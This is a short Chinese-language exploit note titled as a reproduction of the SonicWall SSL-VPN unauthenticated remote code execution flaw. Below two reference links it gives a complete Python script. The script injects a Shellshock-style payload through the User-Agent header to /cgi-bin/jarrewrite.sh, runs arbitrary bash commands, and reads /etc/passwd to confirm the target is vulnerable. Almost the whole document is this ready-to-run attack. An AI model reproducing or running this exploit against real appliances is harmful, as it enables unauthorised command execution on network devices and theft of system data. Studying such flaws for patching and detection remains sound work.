SonicWall SSL-VPN 未授权RCE漏洞 复现

https://www.seebug.org/vuldb/ssvid-99110

https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

exp:

# !/usr/bin/python
import requests
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}
def execute_command(target, command):
    url = target + "/cgi-bin/jarrewrite.sh"
    headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" % (command)}
    r = requests.get(url=url, headers=headers, verify=False,proxies=proxies)
    return r.text


def check_exploitable(target):
    print("(+) Testing %s for pwnability..." % (target))
    output = execute_command(target=target, command="cat /etc/passwd")
    if "root:" in output:
        print(output)
        print("[+]存在漏洞")
        return True
    else:
        print("[!]不存在漏洞")
        return False

if __name__ == "__main__":
    import sys
    url=sys.argv[1]
    check_exploitable(url)